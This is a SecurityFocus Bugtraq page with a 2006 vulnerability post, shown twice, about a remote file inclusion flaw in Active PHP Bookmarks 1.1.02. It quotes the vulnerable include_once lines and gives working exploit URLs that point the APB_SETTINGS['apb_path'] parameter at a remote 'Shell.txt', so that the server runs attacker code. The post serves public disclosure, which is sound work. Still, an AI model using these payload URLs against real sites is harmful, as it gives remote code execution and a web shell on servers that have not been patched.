Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Active PHP Bookmarks (apb.php) Remote file include
Nov 23 2006 10:32PM
philip anselmo (spoonman500 hotmail com)
Title : Active PHP Bookmarks (apb.php) Remote file include
########################################################################
#######
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
------------------------------------------------------------------------
Sorce Code:
http://lbstone.com/apb/downloads/apb-1.1.02.zip
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Active PHP Bookmarks
Catégorie :Remote File Include
------------------------------------------------------------------------
-----
Vulnerable Code:
include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_group_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_view_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path']."apb_common.php"); (apb.php)
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_pat
h']=Shell.txt?
http://www.VicTim.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=She
ll.txt?
------------------------------------------------------------------------
----
greetz:
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my
friends
Special Greeting:AsbMay's Group
channel:www.asb-may.net
contact:spoonman500[at]hotmail[dot]com
_________________________________________________________________
Testez Windows Llive Mail Beta !
http://www.msn.fr/newhotmail/Default.asp?Ath=f
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
########################################################################
#######
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
------------------------------------------------------------------------
Sorce Code:
http://lbstone.com/apb/downloads/apb-1.1.02.zip
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Active PHP Bookmarks
Catégorie :Remote File Include
------------------------------------------------------------------------
-----
Vulnerable Code:
include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_group_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_view_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path']."apb_common.php"); (apb.php)
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_pat
h']=Shell.txt?
http://www.VicTim.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=She
ll.txt?
------------------------------------------------------------------------
----
greetz:
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my
friends
Special Greeting:AsbMay's Group
channel:www.asb-may.net
contact:spoonman500[at]hotmail[dot]com
_________________________________________________________________
Testez Windows Llive Mail Beta !
http://www.msn.fr/newhotmail/Default.asp?Ath=f
[ reply ]